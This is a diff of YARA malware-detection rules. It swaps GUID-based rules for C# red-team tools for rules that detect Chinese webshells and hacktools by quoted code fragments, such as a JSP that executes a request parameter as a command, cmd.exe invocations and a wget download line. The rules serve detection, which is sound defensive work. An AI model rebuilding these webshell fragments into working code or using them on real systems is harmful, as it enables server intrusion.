 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e423b73cd2dd2374a95ad0a36cd34d8d5b4d1085d708781857ea3893b31b22fb"
+		logic_hash = "20446692842ec9481f34dd976f6b309515c33159653f9988a59335d2f04e4138"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ecb835d03060db1ea3496ceca2d79d7c4c6c671c9907e0b0e73bf8d3371fa931"
+		hash2 = "e355a327479dcc4e71a38f70450af02411125c5f101ba262e8df99f9f0fef7b6"
 
 	strings:
-		$typelibguid0lo = "e1e8c029-f7cd-4bd1-952e-e819b41520f0" ascii wide
-		$typelibguid0up = "E1E8C029-F7CD-4BD1-952E-E819B41520F0" ascii wide
-		$typelibguid1lo = "6b40fde7-14ea-4f57-8b7b-cc2eb4a25e6c" ascii wide
-		$typelibguid1up = "6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C" ascii wide
+		$ = "Processor Level: " fullword ascii
+		$ = "CONNECTION ERROR" fullword ascii
+		$ = "FILE_EXECUTE_AND_KILL_MYSELF" ascii
+		$ = "-KILL_PROCESS-" ascii
+		$ = "-FILE_EXECUTE-" ascii
+		$ = "-DOWNLOAD_ERROR-" ascii
+		$ = "CMD_EXECUTE" fullword ascii
+		$ = "\\Interface\\Office\\{31E12FE8-937F-1E32-871D-B1C9AOEF4D4}\\" ascii
+		$ = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Managedinjection : FILE
+rule SIGNATURE_BASE_Tools_Cmd : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c66e7666-b54f-532d-90e1-870292047aec"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/malcomvetter/ManagedInjection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3969-L3987"
+		description = "Chinese Hacktool Set - file cmd.jSp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "27c3cb44-9351-52a2-8e14-afade14e3384"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L10-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "218fe8a52757def3c321668ecaaca3cb0966bad4e151083c08a98276abf71571"
+		hash = "02e37b95ef670336dc95331ec73dbb5a86f3ba2b"
+		logic_hash = "fe1a157d53bd9a48848f2711844c5e12356652ca01c84c19429c55bbb12ea488"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "e5182bff-9562-40ff-b864-5a6b30c3b13b" ascii wide
-		$typelibguid0up = "E5182BFF-9562-40FF-B864-5A6B30C3B13B" ascii wide
-		$typelibguid1lo = "fdedde0d-e095-41c9-93fb-c2219ada55b1" ascii wide
-		$typelibguid1up = "FDEDDE0D-E095-41C9-93FB-C2219ADA55B1" ascii wide
-		$typelibguid2lo = "0dd00561-affc-4066-8c48-ce950788c3c8" ascii wide
-		$typelibguid2up = "0DD00561-AFFC-4066-8C48-CE950788C3C8" ascii wide
+		$s0 = "if(\"1752393\".equals(request.getParameter(\"Confpwd\"))){" fullword ascii
+		$s1 = "java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"Conn\"" ascii
+		$s2 = "<%@ page import=\"java.io.*\" %>" fullword ascii
+		$s3 = "out.print(\"Hi,Man 2015<br /><!--?Confpwd=023&Conn=ls-->\");" fullword ascii
+		$s4 = "while((a=in.read(b))!=-1){" fullword ascii
+		$s5 = "out.println(new String(b));" fullword ascii
+		$s6 = "out.print(\"</pre>\");" fullword ascii
+		$s7 = "out.print(\"<pre>\");" fullword ascii
+		$s8 = "int a = -1;" fullword ascii
+		$s9 = "byte[] b = new byte[2048];" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 3KB and 7 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsocks : FILE
+rule SIGNATURE_BASE_Trigger_Drop : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "343061d9-e24e-5d49-939f-b94c295b17ac"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/nettitude/SharpSocks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3989-L4005"
+		description = "Chinese Hacktool Set - file trigger_drop.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3b4f32ff-2de2-5689-869a-8a8f55e7fa0c"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L35-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ef582f9ba7b49795886c69a48cf9ac11e86fb99c19463f0770f3e9c1e3e2e0c6"
+		hash = "165dd2d82bf87285c8a53ad1ede6d61a90837ba4"
+		logic_hash = "fc998ea5c2a446278823e4336ddc6a22741f82c43fbdcd95b3d12ee6a27b1dd7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "2f43992e-5703-4420-ad0b-17cb7d89c956" ascii wide
-		$typelibguid0up = "2F43992E-5703-4420-AD0B-17CB7D89C956" ascii wide
-		$typelibguid1lo = "86d10a34-c374-4de4-8e12-490e5e65ddff" ascii wide
-		$typelibguid1up = "86D10A34-C374-4DE4-8E12-490E5E65DDFF" ascii wide
+		$s0 = "$_GET['returnto'] = 'database_properties.php';" fullword ascii
+		$s1 = "echo('<meta http-equiv=\"refresh\" content=\"0;url=' . $_GET['returnto'] . '\">'" ascii
+		$s2 = "@mssql_query('DROP TRIGGER" ascii
+		$s3 = "if(empty($_GET['returnto']))" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 5KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharp_Wmiexec : FILE
+rule SIGNATURE_BASE_Injectionparameters : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ae08a5a2-06d5-55fe-803a-7f4696220904"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/checkymander/Sharp-WMIExec"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4007-L4021"
+		description = "Chinese Hacktool Set - file InjectionParameters.vb"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a77bd0c6-8857-577f-831a-0fcf2537667e"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L53-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c5f515ac8db4cca0b29b6d27ad27fa1d4215de48d4827c083f755e88671b87e0"
+		hash = "4f11aa5b3660c45e527606ee33de001f4994e1ea"
+		logic_hash = "6bb786256f7154013408323eeb597f91c609a2a26f5ae9e6d61e16bd9c16a577"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "0a63b0a1-7d1a-4b84-81c3-bbbfe9913029" ascii wide
-		$typelibguid0up = "0A63B0A1-7D1A-4B84-81C3-BBBFE9913029" ascii wide
+		$s0 = "Public Shared ReadOnly Empty As New InjectionParameters(-1, \"\")" fullword ascii
+		$s1 = "Public Class InjectionParameters" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 13KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Keethief : FILE
+rule SIGNATURE_BASE_Users_List : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "71fef0e9-223a-5834-9d1c-f3fb8b66a809"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/GhostPack/KeeThief"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4023-L4046"
+		description = "Chinese Hacktool Set - file users_list.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2d90b593-6b65-502c-aeb0-8f2a3d65afd3"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L69-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "032f0453dc8e235b9326705c619929135cfc71840ab39669ae21c14b93568c75"
+		hash = "6fba1a1a607198ed232405ccbebf9543037a63ef"
+		logic_hash = "debd8e1d882cbbe6e720b86bec3ff3c78393cb225b3f0f9c7725cfced6582e71"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid1lo = "39aa6f93-a1c9-497f-bad2-cc42a61d5710" ascii wide
-		$typelibguid1up = "39AA6F93-A1C9-497F-BAD2-CC42A61D5710" ascii wide
-		$typelibguid3lo = "3fca8012-3bad-41e4-91f4-534aa9a44f96" ascii wide
-		$typelibguid3up = "3FCA8012-3BAD-41E4-91F4-534AA9A44F96" ascii wide
-		$typelibguid4lo = "ea92f1e6-3f34-48f8-8b0a-f2bbc19220ef" ascii wide
-		$typelibguid4up = "EA92F1E6-3F34-48F8-8B0A-F2BBC19220EF" ascii wide
-		$typelibguid5lo = "c23b51c4-2475-4fc6-9b3a-27d0a2b99b0f" ascii wide
-		$typelibguid5up = "C23B51C4-2475-4FC6-9B3A-27D0A2B99B0F" ascii wide
-		$typelibguid7lo = "80ba63a4-7d41-40e9-a722-6dd58b28bf7e" ascii wide
-		$typelibguid7up = "80BA63A4-7D41-40E9-A722-6DD58B28BF7E" ascii wide
+		$s0 = "<a href=\"users_create.php\">Create User</a>" fullword ascii
+		$s7 = "$skiplist = array('##MS_AgentSigningCertificate##','NT AUTHORITY\\NETWORK SERVIC" ascii
+		$s11 = "&nbsp;<b>Default DB</b>&nbsp;" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 12KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Fakelogonscreen : FILE
+rule SIGNATURE_BASE_Trigger_Modify : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "cc20290c-3f34-5e81-9337-c582f1ee7ade"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/bitsadmin/fakelogonscreen"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4048-L4062"
+		description = "Chinese Hacktool Set - file trigger_modify.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a7d65a9f-82de-554c-8f20-7560d2160041"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L86-L103"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4f7f2c075860994b29a211b3cb30fa75b7b6e3ac60a68bbaa9ecf7e4467b4ed0"
+		hash = "c93cd7a6c3f962381e9bf2b511db9b1639a22de0"
+		logic_hash = "6ea0221af9e9a29d3280a01eec69e31e79c358e664d286f8c80259f5e826876c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "d35a55bd-3189-498b-b72f-dc798172e505" ascii wide
-		$typelibguid0up = "D35A55BD-3189-498B-B72F-DC798172E505" ascii wide
+		$s1 = "<form name=\"form1\" method=\"post\" action=\"trigger_modify.php?trigger=<?php e" ascii
+		$s2 = "$data_query = @mssql_query('sp_helptext \\'' . urldecode($_GET['trigger']) . '" ascii
+		$s3 = "if($_POST['query'] != '')" fullword ascii
+		$s4 = "$lines[] = 'I am unable to read this trigger.';" fullword ascii
+		$s5 = "<b>Modify Trigger</b>" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 15KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Poshsecframework : FILE
+rule SIGNATURE_BASE_Customize : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "a91620f3-3f21-525a-bc87-94d21cd126be"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/PoshSec/PoshSecFramework"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4064-L4080"
+		description = "Chinese Hacktool Set - file Customize.aspx"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a69e1234-cc85-5295-a45c-693afdfc368e"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L105-L121"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e0a35f5fc7a4c4ae8f09c7d4833faf55061984f9a7a920ec4219f04381f2053a"
+		hash = "db556879dff9a0101a7a26260a5d0dc471242af2"
+		logic_hash = "f4e0a7342a01411ae060c9d995072518f2e3299af1b0d396bb319eeec42c1519"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "b1ac6aa0-2f1a-4696-bf4b-0e41cf2f4b6b" ascii wide
-		$typelibguid0up = "B1AC6AA0-2F1A-4696-BF4B-0E41CF2F4B6B" ascii wide
-		$typelibguid1lo = "78bfcfc2-ef1c-4514-bce6-934b251666d2" ascii wide
-		$typelibguid1up = "78BFCFC2-EF1C-4514-BCE6-934B251666D2" ascii wide
+		$s1 = "ds.Clear();ds.Dispose();}else{SqlCommand cm = Conn.CreateCommand();cm.CommandTex" ascii
+		$s2 = "c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=tr" ascii
+		$s3 = "Stream WF=WB.GetResponseStream();FileStream FS=new FileStream(Z2,FileMode.Create" ascii
+		$s4 = "R=\"Result\\t|\\t\\r\\nExecute Successfully!\\t|\\t\\r\\n\";}Conn.Close();break;" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 24KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpattack : FILE
+rule SIGNATURE_BASE_Oracle_Data
 {
-	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1eb911ab-3fb9-54b7-8afb-66328f30d563"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/jaredhaight/SharpAttack"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4082-L4096"
+	meta:
+		description = "Chinese Hacktool Set - file oracle_data.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "faa62dcc-0f59-573c-8722-d07216de151f"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L123-L138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2103b98f188d74c340d6ca71590be32c04cadba893882aebf4e22f5046ae4bc9"
+		hash = "6cf070017be117eace4752650ba6cf96d67d2106"
+		logic_hash = "1ab9b6c4349dd891103a24a77c93c2abb784d3ed616523f3aaec68b05082983e"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "5f0ceca3-5997-406c-adf5-6c7fbb6cba17" ascii wide
-		$typelibguid0up = "5F0CECA3-5997-406C-ADF5-6C7FBB6CBA17" ascii wide
+		$s0 = "$txt=fopen(\"oracle_info.txt\",\"w\");" fullword ascii
+		$s1 = "if(isset($_REQUEST['id']))" fullword ascii
+		$s2 = "$id=$_REQUEST['id'];" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Altman : FILE
+rule SIGNATURE_BASE_Reduhservers_Reduh : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "21acc8af-9497-5842-90a9-7a9300585d5d"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/keepwn/Altman"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4098-L4146"
+		description = "Chinese Hacktool Set - file reDuh.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c87d971a-a16f-5593-88fb-6bcd207e0841"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L140-L155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5ef32e351094f26bdaa87043b9ff202c25c67e6cd13935c3eb1ab7b4420b867c"
+		hash = "377886490a86290de53d696864e41d6a547223b0"
+		logic_hash = "dcb1515da696566d01ec64029a34438a56d2df480b9cd2ea586f71ffe3324c1a"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "64cdcd2b-7356-4079-af78-e22210e66154" ascii wide
-		$typelibguid0up = "64CDCD2B-7356-4079-AF78-E22210E66154" ascii wide
-		$typelibguid1lo = "f1dee29d-ca98-46ea-9d13-93ae1fda96e1" ascii wide
-		$typelibguid1up = "F1DEE29D-CA98-46EA-9D13-93AE1FDA96E1" ascii wide
-		$typelibguid2lo = "33568320-56e8-4abb-83f8-548e8d6adac2" ascii wide
-		$typelibguid2up = "33568320-56E8-4ABB-83F8-548E8D6ADAC2" ascii wide
-		$typelibguid3lo = "470ec930-70a3-4d71-b4ff-860fcb900e85" ascii wide
-		$typelibguid3up = "470EC930-70A3-4D71-B4FF-860FCB900E85" ascii wide
-		$typelibguid4lo = "9514574d-6819-44f2-affa-6158ac1143b3" ascii wide
-		$typelibguid4up = "9514574D-6819-44F2-AFFA-6158AC1143B3" ascii wide
-		$typelibguid5lo = "0f3a9c4f-0b11-4373-a0a6-3a6de814e891" ascii wide
-		$typelibguid5up = "0F3A9C4F-0B11-4373-A0A6-3A6DE814E891" ascii wide
-		$typelibguid6lo = "9624b72e-9702-4d78-995b-164254328151" ascii wide
-		$typelibguid6up = "9624B72E-9702-4D78-995B-164254328151" ascii wide
-		$typelibguid7lo = "faae59a8-55fc-48b1-a9b5-b1759c9c1010" ascii wide
-		$typelibguid7up = "FAAE59A8-55FC-48B1-A9B5-B1759C9C1010" ascii wide
-		$typelibguid8lo = "37af4988-f6f2-4f0c-aa2b-5b24f7ed3bf3" ascii wide
-		$typelibguid8up = "37AF4988-F6F2-4F0C-AA2B-5B24F7ED3BF3" ascii wide
-		$typelibguid9lo = "c82aa2fe-3332-441f-965e-6b653e088abf" ascii wide
-		$typelibguid9up = "C82AA2FE-3332-441F-965E-6B653E088ABF" ascii wide
-		$typelibguid10lo = "6e531f6c-2c89-447f-8464-aaa96dbcdfff" ascii wide
-		$typelibguid10up = "6E531F6C-2C89-447F-8464-AAA96DBCDFFF" ascii wide
-		$typelibguid11lo = "231987a1-ea32-4087-8963-2322338f16f6" ascii wide
-		$typelibguid11up = "231987A1-EA32-4087-8963-2322338F16F6" ascii wide
-		$typelibguid12lo = "7da0d93a-a0ae-41a5-9389-42eff85bb064" ascii wide
-		$typelibguid12up = "7DA0D93A-A0AE-41A5-9389-42EFF85BB064" ascii wide
-		$typelibguid13lo = "a729f9cc-edc2-4785-9a7d-7b81bb12484c" ascii wide
-		$typelibguid13up = "A729F9CC-EDC2-4785-9A7D-7B81BB12484C" ascii wide
-		$typelibguid14lo = "55a1fd43-d23e-4d72-aadb-bbd1340a6913" ascii wide
-		$typelibguid14up = "55A1FD43-D23E-4D72-AADB-BBD1340A6913" ascii wide
-		$typelibguid15lo = "d43f240d-e7f5-43c5-9b51-d156dc7ea221" ascii wide
-		$typelibguid15up = "D43F240D-E7F5-43C5-9B51-D156DC7EA221" ascii wide
-		$typelibguid16lo = "c2e6c1a0-93b1-4bbc-98e6-8e2b3145db8e" ascii wide
-		$typelibguid16up = "C2E6C1A0-93B1-4BBC-98E6-8E2B3145DB8E" ascii wide
-		$typelibguid17lo = "714ae6f3-0d03-4023-b753-fed6a31d95c7" ascii wide
-		$typelibguid17up = "714AE6F3-0D03-4023-B753-FED6A31D95C7" ascii wide
+		$s1 = "out.println(\"[Error]Unable to connect to reDuh.jsp main process on port \" +ser" ascii
+		$s4 = "System.out.println(\"IPC service failed to bind to \" + servicePort);" fullword ascii
+		$s17 = "System.out.println(\"Bound on \" + servicePort);" fullword ascii
+		$s5 = "outputFromSockets.add(\"[data]\"+target+\":\"+port+\":\"+sockNum+\":\"+new Strin" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 116KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Browserpass : FILE
+rule SIGNATURE_BASE_Item_Old : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "bad36c36-dbed-527c-a2f5-4dceff1abe4b"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/jabiel/BrowserPass"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4148-L4162"
+		description = "Chinese Hacktool Set - file item-old.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c32bbd48-a363-53c7-84c6-c47581e2f9da"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L157-L172"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "70414002857991016ebd01889d6346b32a553525e06556f5273e53753c3caccc"
+		hash = "daae358bde97e534bc7f2b0134775b47ef57e1da"
+		logic_hash = "181e46408050490dccc4f321bd1072da0436d920e16cc4711b16425eb5bd73ed"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "3cb59871-0dce-453b-857a-2d1e515b0b66" ascii wide
-		$typelibguid0up = "3CB59871-0DCE-453B-857A-2D1E515B0B66" ascii wide
+		$s1 = "$sCmd = \"wget -qc \".escapeshellarg($sURL).\" -O \".$sFile;" fullword ascii
+		$s2 = "$sCmd = \"convert \".$sFile.\" -flip -quality 80 \".$sFileOut;" fullword ascii
+		$s3 = "$sHash = md5($sURL);" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 7KB and 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Mythic : FILE
+rule SIGNATURE_BASE_Tools_2014 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "44237fac-1526-5587-83a1-61d7a54f7da9"
-		date = "2020-12-29"
-		modified = "2023-04-06"
-		reference = "https://github.com/its-a-feature/Mythic"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4164-L4180"
+		description = "Chinese Hacktool Set - file 2014.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bb76321b-003d-5f6b-a84b-425477abe91c"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L174-L189"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f75bb7695d0de67f562e1c1d7505e0f13e9192ccd7bf6f2128897f4a871430be"
+		hash = "74518faf08637c53095697071db09d34dbe8d676"
+		logic_hash = "caa365cc1a641b7dcd5d2082240d981e66caf6da1379ee109a0bb1f651d1f00f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "91f7a9da-f045-4239-a1e9-487ffdd65986" ascii wide
-		$typelibguid0up = "91F7A9DA-F045-4239-A1E9-487FFDD65986" ascii wide
-		$typelibguid1lo = "0405205c-c2a0-4f9a-a221-48b5c70df3b6" ascii wide
-		$typelibguid1up = "0405205C-C2A0-4F9A-A221-48B5C70DF3B6" ascii wide
+		$s0 = "((Invoker) ins.get(\"login\")).invoke(request, response," fullword ascii
+		$s4 = "program = \"cmd.exe /c net start > \" + SHELL_DIR" fullword ascii
+		$s5 = ": \"c:\\\\windows\\\\system32\\\\cmd.exe\")" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 715KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Nuages : FILE
+rule SIGNATURE_BASE_Reduhservers_Reduh_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5ad947e2-bd71-50d4-9bbf-4d018c7ff36a"
-		date = "2020-12-29"
-		modified = "2023-04-06"
-		reference = "https://github.com/p3nt4/Nuages"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4182-L4196"
+		description = "Chinese Hacktool Set - file reDuh.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6050dfde-6c79-5dd8-a772-508668177aa5"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L191-L206"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
